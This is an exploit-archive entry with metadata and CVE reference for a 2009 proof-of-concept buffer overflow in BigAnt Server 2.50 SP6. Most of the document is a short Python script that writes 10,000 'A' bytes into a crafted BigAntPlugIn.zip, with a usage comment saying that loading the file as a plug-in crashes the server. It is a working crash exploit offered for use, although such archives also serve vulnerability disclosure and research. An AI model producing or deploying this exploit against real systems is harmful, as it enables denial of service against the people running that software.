BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)
Author: Dr_IDE
type: dos
platform: windows
port:
date_added: 2009-09-20
date_updated:
verified: 1
codes: OSVDB-62601;CVE-2009-4661
tags:
aliases:
screenshot_url:
application_url:
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-21]